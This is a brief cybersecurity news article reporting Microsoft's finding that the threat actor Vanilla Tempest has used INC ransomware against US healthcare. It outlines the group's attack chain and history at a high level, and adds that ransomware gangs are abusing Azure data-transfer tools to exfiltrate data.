Microsoft has stated that a financially motivated threat actor has been seen deploying a ransomware strain named INC for the first time to attack the healthcare industry in the U.S.
The tech giant's threat intelligence division is following the behavior under the designation Vanilla Tempest (previously DEV-0832).
"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool," it stated in a series of articles posted on X.
In the following stage, the attackers continue to carry out lateral movement over Remote Desktop Protocol (RDP) and then utilize the Windows Management Instrumentation (WMI) Provider Host to deliver the INC ransomware payload.
The Windows manufacturer claimed Vanilla Tempest has been active since at least July 2022, with prior assaults targeting education, healthcare, IT, and manufacturing industries utilizing multiple ransomware families including as BlackCat, Quantum Locker, Zeppelin, and Rhysida.
It's worth mentioning that the threat actor is also tracked under the moniker Vice Society, which is notorious for leveraging previously existing lockers to carry out their assaults, as opposed to constructing a new version of their own.
The news comes as ransomware gangs like BianLian and Rhysida have been detected increasingly employing Azure Storage Explorer and AzCopy to exfiltrate sensitive data from infected networks in an effort to elude detection.
"This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage," modePUSH researcher Britton Manahan said.